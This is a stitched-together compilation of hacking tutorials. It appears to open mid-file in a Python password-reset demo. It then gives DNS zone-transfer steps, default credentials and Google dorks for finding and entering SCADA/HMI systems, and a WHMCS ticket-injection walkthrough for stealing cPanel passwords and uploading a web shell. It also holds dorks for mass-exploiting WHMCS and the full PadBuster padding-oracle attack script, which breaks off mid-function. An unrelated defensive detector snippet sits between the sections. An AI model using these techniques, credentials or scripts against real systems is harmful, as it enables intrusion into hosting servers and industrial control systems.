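        return store.verify(login, row["activation_key"], now=now)
    # hashed scheme: the dumped value is a digest; presenting it as the key fails
    return store.verify(login, row["key_hash"].hex(), now=now)


def demo(t0=1000.0):
    """Run both schemes against the simulated row dump; returns named outcomes."""
    weak = PlaintextResetStore()
    weak.request_reset("admin", now=t0)
    hardened = HashedResetStore()
    real_key = hardened.request_reset("admin", now=t0)
    results = {
        "weak_db_read_resets_password": attacker_with_db_read(weak, "admin", now=t0 + 60),
        "hardened_db_read_resets_password": attacker_with_db_read(hardened, "admin", now=t0 + 60),
        "hardened_real_link_works": hardened.verify("admin", real_key, now=t0 + 60),
        "hardened_expired_link_fails": not hardened.verify(
            "admin", real_key, now=t0 + RESET_TTL_SECONDS + 1),
    }
    hardened.consume("admin")  # simulate a completed reset
    results["hardened_link_single_use"] = not hardened.verify("admin", real_key, now=t0 + 60)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```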
DNS Zone Transfer Vulnerability Exploit
 Scan the website with Acunetix Web Vulnerability Scanner.
 If you get a DNS zone transfer vulnerability:
 Open a command prompt (Run > cmd).
 Do an nslookup.
 type > nslookup
 type > server <website name>
 C:> set type=any
 C:> ls -d <website name>
Hacking SCADA Systems
With the discovery of Stuxnet and all the subsequent interest in industrial control systems, it's
worthwhile to learn a bit about how to exploit these for our own purposes. For now it's a copy-paste
of various information on ICS products. Eventually I will rewrite it as a fluent tutorial, but until
then you can use this article as a starting point in your own research.
Contents :-
 Terminology
 Default Passwords
 Google Dorks
 Vulnerabilities and Other Resources
Terminology:
PLC: Programmable Logic Controller
RTU: Remote Terminal Unit
HMI: Human-Machine Interface
Default Passwords :
These should always be your first try if you come across an HMI. Because these systems have
only recently started receiving attention, many of these HMIs still have their defaults. They can be
accessed using a web panel, telnet, or VNC. Links to support documents have been provided to
familiarize yourself with these systems.
Schneider Electrics :
pcfactory:pcfactory
loader:fwdownload
ntpupdate:ntpupdate
sysdiag:factorycast@schneider
test:testingpw
USER:USER
USER:USERUSER
webserver:webpages
fdrusers:sresurdf
nic2212:poiuypoiuy
nimrohs2212:qwertyqwerty
nip2212:fcsdfcsd
ftpuser:ftpuser
noe77111_v500:RcSyyebczS
AUTCSE:RybQRceeSd
AUT_CSE:cQdd9debez
target:RcQbRbzRyc
Siemens Simatic :
Administrator:100
Siemens WinCC :
WinCCConnect:2WSXcder
WinCCAdmin:2WSXcder
WAGO :
admin:wago
Google Dorks:
These will be added to as I go along, but are just a couple you can try out to search for HMIs.
inurl:/plc/webvisu.htm
"Miniweb on" "Control Functions" -filetype:pdf
Vulnerabilities and Other Resources
Vulnerabilities in some SCADA server software
Metasploit Modules for SCADA-related Vulnerabilities
SIMATIC HMI panels - some default Simatic HMIs you can play around with
WHMCS Hacking with Submit Ticket exploit
Hi Mates!
Today we are going to learn how to hack WHMCS, or you can say its submit ticket exploit,
through which we will get the cPanel username and password of the hosting panel and the
websites hosted on that WHMCS.
Let's start.
Step 1: Get a website which provides hosting and find the option "Submit Ticket".
Step 2: Now open the submit ticket option and click on sales department.
Step 3: Now we have to fill in the following info like "name, email address, urgency": put any
random info in these fields. The main thing is the subject field.
Fill this code in the subject field:
______________________________________________________________________________
and scroll down, fill in the captcha and click the submit button.
We will be redirected to the next page, where it will show the cPanel username and password.
Boom! You have the cPanel usernames and passwords of the hosting panel and of the websites hosted on that server.
If you are lucky, you may also get the FTP and SMTP passwords too!
OK, that was all about the cPanel, FTP and SMTP passwords. If the WHMCS doesn't have any website
hosted on it, you won't get anything. Then what?
Don't be sad :)
We have one more trick, and this will help you to upload a shell on the WHMCS website :)
How?
Let's move :)
Come back to the submit ticket page and put any random info in the email, name and urgency fields.
The main step is to put the PHP code in the subject field. This time we are going to put PHP code which, if it
gets executed successfully, gives us an uploader on the website through which we will be able
to upload a shell on the website. So let's start.
Fill in any random info in the other fields and put this PHP code in the subject field:
______________________________________________________________________________
Fill in the captcha and click enter. Now, first of all, have a look at the submit ticket URL,
for example
http://www.website.com/client/submitticket.php
So to get the uploader, replace submitticket.php with downloads/indexx.php.
Remember, it is indexx.php: when the code executes, it will create indexx.php and its
uploader.
So open the URL
http://www.website.com/client/downloads/indexx.php
You will see a file upload option!
Browse to the shell and click upload. After uploading the shell,
open the URL
http://www.website.com/client/downloads/shell_name.php
Hell yeah,
owned :D
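A server-side check for the {php} tag injection described above, as an added example that is not part of the original document or of WHMCS. The ticket submissions are constructed and the payload body is replaced by a placeholder; the check decodes URL and HTML-entity layers before matching, so an encoded tag is caught too.

```python
"""Reject Smarty {php} template tags in WHMCS ticket fields."""
import html
import re
from urllib.parse import unquote

# Smarty's {php}...{/php} block tag, allowing whitespace, attributes and any case.
SMARTY_PHP_TAG = re.compile(r"\{\s*/?\s*php\b[^}]*\}", re.IGNORECASE)
# The obfuscation shape used in the walkthrough above: eval(base64_decode('...'))
EVAL_B64 = re.compile(r"\beval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)


def normalize(value: str, rounds: int = 3) -> str:
    """Peel URL-encoding and HTML entities so %7Bphp%7D or &#123;php&#125; are seen too."""
    for _ in range(rounds):
        peeled = html.unescape(unquote(value))
        if peeled == value:
            break
        value = peeled
    return value


def inspect_ticket(fields: dict) -> list:
    """Return (field, reason) pairs for user-supplied text that must never reach the
    template engine unescaped."""
    findings = []
    for name, raw in fields.items():
        value = normalize(str(raw))
        if SMARTY_PHP_TAG.search(value):
            findings.append((name, "smarty php tag"))
        if EVAL_B64.search(value):
            findings.append((name, "eval(base64_decode()) payload"))
    return findings


def accept_ticket(fields: dict) -> bool:
    """Server-side gate: refuse the submission outright rather than trying to clean it."""
    return not inspect_ticket(fields)


# Constructed submissions (hypothetical). The payload body from the walkthrough is
# replaced by a placeholder; only its shape matters to the check.
BENIGN = {"name": "Alice", "email": "alice@example.com",
          "subject": "Invoice question", "message": "Where can I download invoice #1234?"}
INJECTED = {"name": "x", "email": "x@example.com",
            "subject": "{php}eval(base64_decode('PAYLOAD_PLACEHOLDER'));exit;{/php}",
            "message": "urgent"}
ENCODED = {"name": "x", "email": "x@example.com",
           "subject": "%7B%20PHP%20%7Decho%201%3B%7B%2Fphp%7D", "message": "x"}
```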
WHMCS Auto Exploiter
 Take the WHMCS auto exploiter PHP script.
 Upload it to some PHP server.
 In the Google Dork field make your own dork and click exploit, like :
Dorks :
inurl:submitticket.php site:.com
inurl:submitticket.php site:.net
inurl:submitticket.php site:.us
inurl:submitticket.php site:.eu
inurl:submitticket.php site:.org
inurl:submitticket.php site:.uk
intext:”Powered by WHMCompleteSolution”
intext:”Powered by WHMCompleteSolution” inurl:clientarea.php
inurl:announcements.php intext:”WHMCompleteSolution”
intext:”Powered by WHMCS”
 Crack the hash.
 Go to the site, open the admin panel and log in.
Oracle Padding Attack Using Burp Suite
Requirements :
 Microsoft SQL Server 2008 R2
 Burp Suite Professional v1.4.07
 exe.bat [ Save it in Notepad and rename it as exe.bat ]
@echo off
cmd
 padBuster.pl [ Save it in Notepad and rename it as padBuster.pl ]
#!/usr/bin/perl
#
# PadBuster v0.3.3 - Automated script for performing Padding Oracle attacks
# Brian Holyfield - Gotham Digital Science (labs@gdssecurity.com)
#
# Credits to J.Rizzo and T.Duong for providing proof of concept web exploit
# techniques and S.Vaudenay for initial discovery of the attack. Credits also
# to James M. Martin (research@esptl.com) for sharing proof of concept exploit
# code for performing various brute force attack techniques, and wireghoul (Eldar
# Marcussen) for making code quality improvements.
#
use LWP::UserAgent;
use strict;
use warnings;
use Getopt::Std;
use MIME::Base64;
use URI::Escape;
use Getopt::Long;
use Time::HiRes qw( gettimeofday );
use Compress::Zlib;
use Crypt::SSLeay;
# Set defaults with $variable = value
my $logFiles;
my $post;
my $encoding = 0;
my $headers;
my $cookie;
my $error;
my $prefix;
my $intermediaryInput;
my $cipherInput;
my $plainTextInput;
my $encodedPlainTextInput;
my $noEncodeOption;
my $superVerbose;
my $proxy;
my $proxyAuth;
my $noIv;
my $auth;
my $resumeBlock;
my $interactive = 0;
my $bruteForce;
my $ignoreContent;
my $useBody;
my $verbose;
GetOptions( "log" => \$logFiles,
"post=s" => \$post,
"encoding=s" => \$encoding,
"headers=s" => \$headers,
"cookies=s" => \$cookie,
"error=s" => \$error,
"prefix=s" => \$prefix,
"intermediate=s" => \$intermediaryInput,
"ciphertext=s" => \$cipherInput,
"plaintext=s" => \$plainTextInput,
"encodedtext=s" => \$encodedPlainTextInput,
"noencode" => \$noEncodeOption,
"veryverbose" => \$superVerbose,
"proxy=s" => \$proxy,
"proxyauth=s" => \$proxyAuth,
"noiv" => \$noIv,
"auth=s" => \$auth,
"resume=s" => \$resumeBlock,
"interactive" => \$interactive,
"bruteforce" => \$bruteForce,
"ignorecontent" => \$ignoreContent,
"usebody" => \$useBody,
"verbose" => \$verbose);
print "\n+-------------------------------------------+\n";
print "| PadBuster - v0.3.3                        |\n";
print "| Brian Holyfield - Gotham Digital Science  |\n";
print "| labs\@gdssecurity.com                     |\n";
print "+-------------------------------------------+\n";
if ($#ARGV < 2) {
die "
Use: padBuster.pl URL EncryptedSample BlockSize [options]
Where: URL = The target URL (and query string if applicable)
EncryptedSample = The encrypted value you want to test. Must
also be present in the URL, PostData or a Cookie
BlockSize = The block size being used by the algorithm
Options:
-auth [username:password]: HTTP Basic Authentication
-bruteforce: Perform brute force against the first block
-ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)
-cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)
-encoding [0-4]: Encoding Format of Sample (Default 0)
0=Base64, 1=Lower HEX, 2=Upper HEX
3=.NET UrlToken, 4=WebSafe Base64
-encodedtext [Encoded String]: Data to Encrypt (Encoded)
-error [Error String]: Padding Error Message
-headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)
-interactive: Prompt for confirmation on decrypted bytes
-intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)
-log: Generate log files (creates folder PadBuster.DDMMYY)
-noencode: Do not URL-encode the payload (encoded by default)
-noiv: Sample does not include IV (decrypt first block)
-plaintext [String]: Plain-Text to Encrypt
-post [Post Data]: HTTP Post Data String
-prefix [Prefix]: Prefix bytes to append to each sample (Encoded)
-proxy [address:port]: Use HTTP/S Proxy
-proxyauth [username:password]: Proxy Authentication
-resume [Block Number]: Resume at this block number
-usebody: Use response body content for response analysis phase
-verbose: Be Verbose
-veryverbose: Be Very Verbose (Debug Only)
";}
# Ok, if we've made it this far we are ready to begin..
my $url = $ARGV[0];
my $sample = $ARGV[1];
my $blockSize = $ARGV[2];
if ($url eq "" || $sample eq "" || $blockSize eq "") {
print "\nERROR: The URL, EncryptedSample and BlockSize cannot be null.\n";
exit();
}
# Hard Coded Inputs
#$post = "";
#$sample = "";
my $method = $post ? "POST" : "GET";
# These are file related variables
my $dirName = "PadBuster." . &getTime("F");
my $dirSlash = "/";
my $dirCmd = "mkdir ";
if (defined($ENV{'OS'})) {
if ($ENV{OS} =~ /Windows/) {
$dirSlash = "\\";
$dirCmd = "md ";
}
}
my $dirExists = 0;
my $printStats = 0;
my $requestTracker = 0;
my $timeTracker = 0;
if ($encoding < 0 || $encoding > 4) {
print "\nERROR: Encoding must be a value between 0 and 4\n";
exit();
}
my $encodingFormat = $encoding ? $encoding : 0;
my $encryptedBytes = $sample;
my $totalRequests = 0;
# See if the sample needs to be URL decoded, otherwise don't (the plus from B64 will be a problem)
if ($sample =~ /%/) {
$encryptedBytes = &uri_unescape($encryptedBytes)
}
# Prep the sample for regex use
$sample = quotemeta $sample;
# Now decode
$encryptedBytes = &myDecode($encryptedBytes, $encodingFormat);
if ( (length($encryptedBytes) % $blockSize) > 0) {
print "\nERROR: Encrypted Bytes must be evenly divisible by Block Size ($blockSize)\n";
print " Encrypted sample length is ".int(length($encryptedBytes)).". Double check the Encoding and Block Size.\n";
exit();
}
# If no IV, then append nulls as the IV (only if decrypting)
if ($noIv && !$bruteForce && !$plainTextInput) {
$encryptedBytes = "\x00" x $blockSize . $encryptedBytes;
}
# PlainTextBytes is where the complete decrypted sample will be stored (decrypt only)
my $plainTextBytes;
# This is a bool to make sure we know where to replace the sample string
my $wasSampleFound = 0;
# ForgedBytes is where the complete forged sample will be stored (encrypt only)
my $forgedBytes;
# Isolate the IV into a separate byte array
my $ivBytes = substr($encryptedBytes, 0, $blockSize);
# Declare some optional elements for storing the results of the first test iteration
# to help the user if they don't know what the padding error looks like
my @oracleCantidates;
my $oracleSignature = "";
my %oracleGuesses;
my %responseFileBuffer;
# The block count should be the sample divided by the blocksize
my $blockCount = int(length($encryptedBytes)) / int($blockSize);
if (!$bruteForce && !$plainTextInput && $blockCount < 2) {
print "\nERROR: There is only one block. Try again using the -noiv option.\n";
exit();
}
# The attack works by sending in a real cipher text block along with a fake block in front of it
# You only ever need to send two blocks at a time (one real one fake) and just work through
# the sample one block at a time
# First, re-issue the original request to let the user know if something is potentially broken
my ($status, $content, $location, $contentLength) = &makeRequest($method, $url, $post,
$cookie);
&myPrint("\nINFO: The original request returned the following",0);
&myPrint("[+] Status: $status",0);
&myPrint("[+] Location: $location",0);
&myPrint("[+] Content Length: $contentLength\n",0);
&myPrint("[+] Response: $content\n",1);
$plainTextInput = &myDecode($encodedPlainTextInput,$encodingFormat) if
$encodedPlainTextInput;
if ($bruteForce) {
&myPrint("INFO: Starting PadBuster Brute Force Mode",0);
my $bfAttempts = 0;
print "INFO: Resuming previous brute force at attempt $resumeBlock\n" if $resumeBlock;
# Only loop through the first 3 bytes...this should be enough as it
# requires 16.5M+ requests
my @bfSamples;
my $sampleString = "\x00" x 2;
for my $c (0 ... 255) {
substr($sampleString, 0, 1, chr($c));
for my $d (0 ... 255) {
substr($sampleString, 1, 1, chr($d));
push (@bfSamples, $sampleString);
}
}
foreach my $testVal (@bfSamples) {
my $complete = 0;
while ($complete == 0) {
my $repeat = 0;
for my $b (0 ... 255) {
$bfAttempts++;
if ( $resumeBlock && ($bfAttempts < ($resumeBlock - ($resumeBlock % 256)+1)) ) {
#SKIP
} else {
my $testBytes = chr($b).$testVal;
$testBytes .= "\x00" x ($blockSize-3);
my $combinedBf = $testBytes;
$combinedBf .= $encryptedBytes;
$combinedBf = &myEncode($combinedBf, $encoding);
# Add the Query String to the URL
my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post, $cookie,
$sample, $combinedBf);
# Issue the request
my ($status, $content, $location, $contentLength) = &makeRequest($method,
$testUrl, $testPost, $testCookies);
my $signatureData = "$status\t$contentLength\t$location";
$signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;
if ($oracleSignature eq "") {
&myPrint("[+] Starting response analysis...\n",0) if ($b ==0);
$oracleGuesses{$signatureData}++;
$responseFileBuffer{$signatureData} = "Status: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";
if ($b == 255) {
&myPrint("*** Response Analysis Complete ***\n",0);
&determineSignature();
$printStats = 1;
$timeTracker = 0;
$requestTracker = 0;
$repeat = 1;
$bfAttempts = 0;
}
}
if ($oracleSignature ne "" && $oracleSignature ne $signatureData) {
&myPrint("\nAttempt $bfAttempts - Status: $status - Content Length: $contentLength\n$testUrl\n",0);
&writeFile("Brute_Force_Attempt_".$bfAttempts.".txt", "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content");
}
}
}
($repeat == 1) ? ($complete = 0) : ($complete = 1);
}
}
} elsif ($plainTextInput) {
# ENCRYPT MODE
&myPrint("INFO: Starting PadBuster Encrypt Mode",0);
# The block count will be the plaintext divided by blocksize (rounded up)
my $blockCount = int(((length($plainTextInput)+1)/$blockSize)+0.99);
&myPrint("[+] Number of Blocks: ".$blockCount."\n",0);
my $padCount = ($blockSize * $blockCount) - length($plainTextInput);
$plainTextInput.= chr($padCount) x $padCount;
# SampleBytes is the encrypted text you want to derive intermediate values for, so
# copy the current ciphertext block into sampleBytes
# Note, nulls are used if not provided and the intermediate values are brute forced
$forgedBytes = $cipherInput ? &myDecode($cipherInput,1) : "\x00" x $blockSize;
my $sampleBytes = $forgedBytes;
for (my $blockNum = $blockCount; $blockNum > 0; $blockNum--) {
# IntermediaryBytes is where the intermediate bytes produced by the algorithm are stored
my $intermediaryBytes;
if ($intermediaryInput && $blockNum == $blockCount) {
$intermediaryBytes = &myDecode($intermediaryInput,2);
} else {
$intermediaryBytes = &processBlock($sampleBytes);
}
# Now XOR the intermediate bytes with the corresponding bytes from the plain-text block
# This will become the next ciphertext block (or IV if the last one)
$sampleBytes = $intermediaryBytes ^ substr($plainTextInput, (($blockNum-1) *
$blockSize), $blockSize);
$forgedBytes = $sampleBytes.$forgedBytes;
&myPrint("nBlock ".($blockNum)." Results:",0);
&myPrint("[+] New Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
&myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1)."\n",0);
}
$forgedBytes = &myEncode($forgedBytes, $encoding);
chomp($forgedBytes);
} else {
# DECRYPT MODE
&myPrint("INFO: Starting PadBuster Decrypt Mode",0);
if ($resumeBlock) {
&myPrint("INFO: Resuming previous exploit at Block $resumeBlock\n",0);
} else {
$resumeBlock = 1
}
# Assume that the IV is included in our sample and that the first block is the IV
for (my $blockNum = ($resumeBlock+1); $blockNum <= $blockCount; $blockNum++)
{
# Since the IV is the first block, our block count is artificially inflated by one
&myPrint("*** Starting Block ".($blockNum-1)." of ".($blockCount-1)." ***\n",0);
# SampleBytes is the encrypted text you want to break, so
# lets copy the current ciphertext block into sampleBytes
my $sampleBytes = substr($encryptedBytes, ($blockNum * $blockSize -
$blockSize), $blockSize);
# IntermediaryBytes is where the intermediary bytes produced by the algorithm are stored
my $intermediaryBytes = &processBlock($sampleBytes);
# DecryptedBytes is where the decrypted block is stored
my $decryptedBytes;
# Now we XOR the decrypted byte with the corresponding byte from the previous block
# (or IV if we are in the first block) to get the actual plain-text
$blockNum == 2 ? $decryptedBytes = $intermediaryBytes ^ $ivBytes :
$decryptedBytes = $intermediaryBytes ^ substr($encryptedBytes, (($blockNum - 2) *
$blockSize), $blockSize);
&myPrint("nBlock ".($blockNum-1)." Results:",0);
&myPrint("[+] Cipher Text (HEX): ".&myEncode($sampleBytes,1),0);
&myPrint("[+] Intermediate Bytes (HEX): ".&myEncode($intermediaryBytes,1),0);
&myPrint("[+] Plain Text: $decryptedBytes\n",0);
$plainTextBytes = $plainTextBytes.$decryptedBytes;
}
}
&myPrint("-------------------------------------------------------",0);
&myPrint("** Finished ***\n", 0);
if ($plainTextInput) {
&myPrint("[+] Encrypted value is: ".&uri_escape($forgedBytes),0);
} else {
&myPrint("[+] Decrypted value (ASCII): $plainTextBytes\n",0);
&myPrint("[+] Decrypted value (HEX): ".&myEncode($plainTextBytes,2)."\n", 0);
&myPrint("[+] Decrypted value (Base64): ".&myEncode($plainTextBytes,0)."\n", 0);
}
&myPrint("-------------------------------------------------------\n",0);
sub determineSignature {
# Help the user detect the oracle response if an error string was not provided
# This logic will automatically suggest the response pattern that occured most often
# during the test as this is the most likeley one
my @sortedGuesses = sort {$oracleGuesses{$a} <=> $oracleGuesses{$b}} keys
%oracleGuesses;
&myPrint("The following response signatures were returned:\n",0);
&myPrint("-------------------------------------------------------",0);
if ($useBody) {
&myPrint("ID#\tFreq\tStatus\tLength\tChksum\tLocation",0);
} else {
&myPrint("ID#\tFreq\tStatus\tLength\tLocation",0);
}
&myPrint("-------------------------------------------------------",0);
my $id = 1;
foreach (@sortedGuesses) {
my $line = $id;
($id == $#sortedGuesses+1 && $#sortedGuesses != 0) ? $line.= " **" : $line.="";
my @sigFields = split("\t", $_);
$line .= "\t$oracleGuesses{$_}\t$sigFields[0]\t$sigFields[1]";
$useBody ? ( $line .= "\t".unpack( '%32A*', $sigFields[3] ) ) : $line.="";
$line .= "\t$sigFields[2]";
&myPrint($line,0);
&writeFile("Response_Analysis_Signature_".$id.".txt",
$responseFileBuffer{$_});
$id++;
}
&myPrint("-------------------------------------------------------",0);
if ($#sortedGuesses == 0 && !$bruteForce) {
&myPrint("\nERROR: All of the responses were identical.\n",0);
&myPrint("Double check the Block Size and try again.",0);
exit();
} else {
my $responseNum = &promptUser("\nEnter an ID that matches the error condition\nNOTE: The ID# marked with ** is recommended");
&myPrint("\nContinuing test with selection $responseNum\n",0);
$oracleSignature = $sortedGuesses[$responseNum-1];
}
}
sub prepRequest {
my ($pUrl, $pPost, $pCookie, $pSample, $pTestBytes) = @_;
# Prepare the request
my $testUrl = $pUrl;
my $wasSampleFound = 0;
if ($pUrl =~ /$pSample/) {
$testUrl =~ s/$pSample/$pTestBytes/;
$wasSampleFound = 1;
}
my $testPost = "";
if ($pPost) {
$testPost = $pPost;
if ($pPost =~ /$pSample/) {
$testPost =~ s/$pSample/$pTestBytes/;
$wasSampleFound = 1;
}
}
my $testCookies = "";
if ($pCookie) {
$testCookies = $pCookie;
if ($pCookie =~ /$pSample/) {
$testCookies =~ s/$pSample/$pTestBytes/;
$wasSampleFound = 1;
}
}
if ($wasSampleFound == 0) {
&myPrint("ERROR: Encrypted sample was not found in the test request",0);
exit();
}
return ($testUrl, $testPost, $testCookies);
}
sub processBlock {
my ($sampleBytes) = @_;
my $analysisMode;
# Analysis mode is either 0 (response analysis) or 1 (exploit)
$analysisMode = (!$error && $oracleSignature eq "") ? 0 : 1;
# The return value of this subroutine is the intermediate text for the block
my $returnValue;
my $complete = 0;
my $autoRetry = 0;
my $hasHit = 0;
while ($complete == 0) {
# Reset the return value
$returnValue = "";
my $repeat = 0;
# TestBytes are the fake bytes that are pre-pending to the cipher test for the padding attack
my $testBytes = "\x00" x $blockSize;
my $falsePositiveDetector = 0;
# Work on one byte at a time, starting with the last byte and moving backwards
OUTERLOOP:
for (my $byteNum = $blockSize - 1; $byteNum >= 0; $byteNum--) {
INNERLOOP:
for (my $i = 255; $i >= 0; $i--) {
# Fuzz the test byte
substr($testBytes, $byteNum, 1, chr($i));
# Combine the test bytes and the sample
my $combinedTestBytes = $testBytes.$sampleBytes;
if ($prefix) {
$combinedTestBytes =
&myDecode($prefix,$encodingFormat).$combinedTestBytes
}
$combinedTestBytes = &myEncode($combinedTestBytes,
$encodingFormat);
chomp($combinedTestBytes);
if (! $noEncodeOption) {
$combinedTestBytes = &uri_escape($combinedTestBytes);
}
my ($testUrl, $testPost, $testCookies) = &prepRequest($url, $post,
$cookie, $sample, $combinedTestBytes);
# Ok, now make the request
my ($status, $content, $location, $contentLength) =
&makeRequest($method, $testUrl, $testPost, $testCookies);
my $signatureData = "$status\t$contentLength\t$location";
$signatureData = "$status\t$contentLength\t$location\t$content" if $useBody;
# If this is the first block and there is no padding error message defined, then cycle through
# all possible requests and let the user decide what the padding error behavior is.
if ($analysisMode == 0) {
&myPrint("INFO: No error string was provided...starting response analysis\n",0) if ($i == 255);
$oracleGuesses{$signatureData}++;
$responseFileBuffer{$signatureData} = "URL: $testUrl\nPost Data: $testPost\nCookies: $testCookies\n\nStatus: $status\nLocation: $location\nContent-Length: $contentLength\nContent:\n$content";
if ($byteNum == $blockSize - 1 && $i == 0) {
&myPrint("*** Response Analysis Complete ***\n",0);
&determineSignature();
$analysisMode = 1;
$repeat = 1;
last OUTERLOOP;
}
}
my $continue = "y";
if (($error && $content !~ /$error/) || ($oracleSignature ne "" &&
$oracleSignature ne $signatureData)) {
# This is for autoretry logic (only works on the first byte)
if ($autoRetry == 1 && ($byteNum == ($blockSize - 1) )
&& $hasHit == 0 ) {
$hasHit++;
} else {
# If there was no padding error, then it worked
&myPrint("[+] Success: (".abs($i-256)."/256) [Byte ".($byteNum+1)."]",0);
&myPrint("[+] Test Byte:".&uri_escape(substr($testBytes, $byteNum, 1)),1);
# If continually getting a hit on attempt zero, then something is probably wrong
$falsePositiveDetector++ if ($i == 255);
if ($interactive == 1) {
$continue = &promptUser("Do you want to use this value (Yes/No/All)? [y/n/a]","",1);
}
if ($continue eq "y" || $continue eq "a") {
$interactive = 0 if ($continue eq "a");
# Next, calculate the decrypted byte by XORing it with the padding value
my ($currentPaddingByte, $nextPaddingByte);
# These variables could allow for flexible padding schemes (for now PKCS)
# For PKCS#7, the padding block is equal to chr($blockSize - $byteNum)
$currentPaddingByte = chr($blockSize - $byteNum);
$nextPaddingByte = chr($blockSize - $byteNum + 1);
my $decryptedByte = substr($testBytes, $byteNum, 1) ^ $currentPaddingByte;
&myPrint("[+] XORing with Padding Char, which is ".&uri_escape($currentPaddingByte),1);
$returnValue = $decryptedByte.$returnValue;
&myPrint("[+] Decrypted Byte is: ".&uri_escape($decryptedByte),1);
# Finally, update the test bytes in preparation for the next round, based on the padding used
for (my $k = $byteNum; $k < $blockSize; $k++) {
# First, XOR the current test byte with the padding value for this round to recover the decrypted byte
substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $currentPaddingByte));
# Then, XOR it again with the padding byte for the next round
substr($testBytes, $k, 1,(substr($testBytes, $k, 1) ^ $nextPaddingByte));
}
last INNERLOOP;
}
}
}
## TODO: Combine these two blocks?
if ($i == 0 && $analysisMode == 1) {
# End of the road with no success. We should probably try again.
&myPrint("ERROR: No matching response on [Byte ".($byteNum+1)."]",0);
if ($autoRetry == 0) {
$autoRetry = 1;
&myPrint(" Automatically trying one more time...",0);
$repeat = 1;
last OUTERLOOP;
} else {
if (($byteNum == $blockSize - 1) && ($error)) {
&myPrint("\nAre you sure you specified the correct error string?",0);
&myPrint("Try re-running without the -e option to perform a response analysis.\n",0);
}
$continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
if ($continue ne "n") {
&myPrint("INFO: Switching to interactive mode",0);
$interactive = 1;
$repeat = 1;
last OUTERLOOP;
}
}
}
if ($falsePositiveDetector == $blockSize) {
&myPrint("\n*** ERROR: It appears there are false positive results. ***\n",0);
&myPrint("HINT: The most likely cause for this is an incorrect error string.\n",0);
if ($error) {
&myPrint("[+] Check the error string you provided and try again, or consider running",0);
&myPrint("[+] without an error string to perform an automated response analysis.\n",0);
} else {
&myPrint("[+] You may want to consider defining a custom padding error string",0);
&myPrint("[+] instead of the automated response analysis.\n",0);
}
$continue = &promptUser("Do you want to start this block over? (Yes/No)? [y/n/a]","",1);
if ($continue eq "y") {
&myPrint("INFO: Switching to interactive mode",0);
$interactive = 1;
$repeat = 1;
last OUTERLOOP;
}
}
}
}
($repeat == 1) ? ($complete = 0) : ($complete = 1);
}
return $returnValue;
}
sub makeRequest {
my ($method, $url, $data, $cookie) = @_;
my ($noConnect, $lwp, $status, $content, $req, $location, $contentLength);
my $numRetries = 0;
$data ='' unless $data;
$cookie='' unless $cookie;
$requestTracker++;
do {
#Quick hack to avoid hostname in URL when using a proxy with SSL (this will get re-set later if needed)
$ENV{HTTPS_PROXY} = "";
$lwp = LWP::UserAgent->new(env_proxy => 1,
keep_alive => 1,
timeout => 30,
requests_redirectable => [],
);
$req = new HTTP::Request $method => $url;
&myPrint("Request:\n$method\n$url\n$data\n$cookie",0) if $superVerbose;
# Add request content for POST and PUTS
if ($data) {
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
}
if ($proxy) {
my $proxyUrl = "http://";
if ($proxyAuth) {
my ($proxyUser, $proxyPass) = split(":",$proxyAuth);
$ENV{HTTPS_PROXY_USERNAME} = $proxyUser;
$ENV{HTTPS_PROXY_PASSWORD} = $proxyPass;
$proxyUrl .= $proxyAuth."@";
}
$proxyUrl .= $proxy;
$lwp->proxy(['http'], "http://".$proxy);
$ENV{HTTPS_PROXY} = "http://".$proxy;
}
if ($auth) {
my ($httpuser, $httppass) = split(/:/,$auth);
$req->authorization_basic($httpuser, $httppass);
}
# If cookies are defined, add a COOKIE header
if (! $cookie eq "") {
$req->header(Cookie => $cookie);
}
if ($headers) {
my @customHeaders = split(/;/i,$headers);
for (my $i = 0; $i <= $#customHeaders; $i++) {
my ($headerName, $headerVal) = split(/::/i,$customHeaders[$i]);
$req->header($headerName, $headerVal);
}
}
my $startTime = &gettimeofday();
my $response = $lwp->request($req);
my $endTime = &gettimeofday();
$timeTracker = $timeTracker + ($endTime - $startTime);
if ($printStats == 1 && $requestTracker % 250 == 0) {
print "[+] $requestTracker Requests Issued (Avg Request Time: ".(sprintf "%.3f", $timeTracker/100).")\n";
$timeTracker = 0;
}
# Extract the required attributes from the response
$status = substr($response->status_line, 0, 3);
$content = $response->content;
&myPrint("Response Content:\n$content",0) if $superVerbose;
$location = $response->header("Location");
if (!$location) {
$location = "N/A";
}
#$contentLength = $response->header("Content-Length");
$contentLength = length($content);
my $contentEncoding = $response->header("Content-Encoding");
if ($contentEncoding) {
if ($contentEncoding =~ /GZIP/i ) {
$content = Compress::Zlib::memGunzip($content);
$contentLength = length($content);
}
}
my $statusMsg = $response->status_line;
#myPrint("Status: $statusMsg, Location: $location, Length: $contentLength",1);
if ($statusMsg =~ /Can't connect/) {
print "ERROR: $statusMsg\n Retrying in 10 seconds...\n\n";
$noConnect = 1;
$numRetries++;
sleep 10;
} else {
$noConnect = 0;
$totalRequests++;
}
} until (($noConnect == 0) || ($numRetries >= 15));
if ($numRetries >= 15) {
&myPrint("ERROR: Number of retries has exceeded 15 attempts...quitting.\n",0);
exit;
}
return ($status, $content, $location, $contentLength);
}
sub myPrint {
my ($printData, $printLevel) = @_;
$printData .= "\n";
if (($verbose && $printLevel > 0) || $printLevel < 1 || $superVerbose) {
print $printData;
&writeFile("ActivityLog.txt",$printData);
}
}
sub myEncode {
my ($toEncode, $format) = @_;
return &encodeDecode($toEncode, 0, $format);
}
sub myDecode {
my ($toDecode, $format) = @_;
return &encodeDecode($toDecode, 1, $format);
}
sub encodeDecode {
my ($toEncodeDecode, $oper, $format) = @_;
# Oper: 0=Encode, 1=Decode
